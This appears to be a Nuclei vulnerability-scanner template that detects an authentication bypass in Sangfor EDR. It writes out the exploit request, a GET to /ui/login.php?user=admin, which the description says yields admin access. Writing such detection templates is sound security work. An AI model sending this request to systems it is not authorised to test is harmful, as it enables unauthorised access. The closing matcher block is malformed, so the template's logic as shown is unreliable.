id: sangfor-edr-auth-bypass
info:
name: Sangfor EDR Authentication Bypass
author: princechaddha
severity: high
description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username.
tags: sangfor,auth-bypass,login
requests:
- method: GET
path:
- "{{BaseURL}}/ui/login.php?user=admin"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- "/download/edr_installer_"
part: body
- 'Set-Cookie=""'
part: header
negative: true
- 'Set-Cookie='